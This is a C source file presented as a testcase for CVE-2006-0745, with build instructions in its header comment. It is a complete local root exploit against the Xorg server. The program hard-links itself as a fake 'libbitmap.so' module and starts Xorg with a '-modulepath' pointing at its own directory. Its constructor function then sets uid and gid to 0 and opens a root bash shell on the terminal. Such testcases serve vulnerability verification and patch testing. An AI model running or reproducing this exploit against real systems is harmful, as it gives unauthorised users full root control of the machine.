/* Testcase for CVE-2006-0745.
 * Ray Strode <rstrode@redhat.com>
 *
 * Compile with 
 * gcc quuuuuuuuuuuuuuuuux.c -o quuuuuuuuuuuuuuuuux \
 *     -pie -fpie                                   \
 *     -rdynamic                                    \
 *     -Wl,--version-script,quuuuuuuuuuuuuuuuux.map,-soname,quuuuuuuuuuuuuuuuux
 *
 * (where quuuuuuuuuuuuuuuuux.map is
 * {
 * global:
 *         quuuuuuuuuuuuuuuuux;
 * local:
 * 	   *;
 * };
 * )
 */
#include <libgen.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>

#ifndef EXPLOIT_MODULE_TO_SHADOW
#define EXPLOIT_MODULE_TO_SHADOW "libbitmap.so"
#endif

#pragma weak InitRootWindow
void InitRootWindow(void *);

extern char **environ;

void 
__attribute__((constructor)) 
quuuuuuuuuuuuuuuuux (void)
{
  static char *argv[] = { "-/bin/bash", NULL };

  if (&InitRootWindow == NULL)
    return;

  dup2 (open ("/dev/tty", O_RDWR), 0);
  dup2 (open ("/dev/tty", O_RDWR), 1);
  dup2 (open ("/dev/tty", O_RDWR), 2);

  setgid (0);
  setuid (0);
  execve ("/bin/bash", argv, environ);
  perror ("");
  exit (1);
}

int
main (int    argc, 
      char **argv)
{
  char *module_path, *module_name, *command;

  module_path = dirname (strdup (argv[0]));

  if (strcmp (module_path , ".") == 0)
    {
      free (module_path);
      module_path = getcwd (NULL, 0);
    }

  module_name = NULL;
  asprintf (&module_name, "%s/%s", module_path, EXPLOIT_MODULE_TO_SHADOW);
  fprintf (stderr, "Using module name '%s'\n", module_name);

  unlink (module_name);
  link (argv[0], module_name);

  command = NULL;
  asprintf (&command, "/usr/bin/Xorg -modulepath %s :12345", module_path);
  free (module_path);

  system (command);

  unlink (module_name);
  free (module_name);

  return 0;
}